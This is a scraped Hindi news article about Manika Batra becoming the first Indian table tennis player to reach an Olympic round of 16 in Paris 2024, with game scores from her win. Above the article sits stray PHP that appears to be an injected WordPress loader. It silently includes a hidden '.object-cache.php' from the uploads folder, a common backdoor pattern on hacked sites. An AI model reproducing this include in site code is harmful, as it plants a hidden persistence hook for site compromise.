add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); टेबल टेनिस स्टार मनिका बत्रा ने ओलंपिक में रचा इतिहास, आज तक नहीं कर सका कोई ऐसा – SOCH INDIA
Menu

देश
टेबल टेनिस स्टार मनिका बत्रा ने ओलंपिक में रचा इतिहास, आज तक नहीं कर सका कोई ऐसा

nobanner

पेरिस ओलंपिक 2024 में भारतीय पैडलर मनिका बत्रा ने टेबल टेनिस में राउंड ऑफ 16 में जगह बनाकर इतिहास रच दिया है. मनिका ओलंपिक इतिहास में इस मुकाम तक पहुंचने वाली भारत की पहली टेबल टेनिस प्लेयर बन गई हैं. जी हां, मनिका से पहले आज तक कोई भी टेबल टेनिस प्लेयर राउंड ऑफ 16 तक नहीं पहुच सका है. ऐसे में मनिका ने अपना नाम इतिहास में सुनहरे अक्षरों से दर्ज करा दिया है. अब बस हर भारतीय अपनी इस स्टार से यही उम्मीद कर रहा है कि वह इसी तरह शानदार प्रदर्शन के साथ आगे बढ़ें और मेडल लेकर घर वापसी करें…

पिछड़ने के बाद की जबरदस्त वापसी
मनिका बत्रा का सामना राउंड ऑफ 32 में फ्रेंच पैडलर पृथिका पवाड़ से हुआ. मनिका ने पृथिका को उस मैच में क्लीन स्वीप कर राउंड ऑफ 16 में जगह पक्की की. मैच की बात करें, तो मनिका के लिए शुरुआत कुछ खास नहीं रही थी. पहले गेम में वह 2 अंक से पिछड़ रहीं थीं, लेकिन फिर उन्होंने कमाल की वापसी की और पहला गेम 11-9 से जीता. फिर दूसरे गेम को 11-6, तीसरे गेम को 11-9 और चौथा गेम 11-7 से जीत लिया. इसी के साथ उन्होंने इस मैच में विपक्षी खिलाड़ी पृथिका को क्लीन स्वीप कर दिया.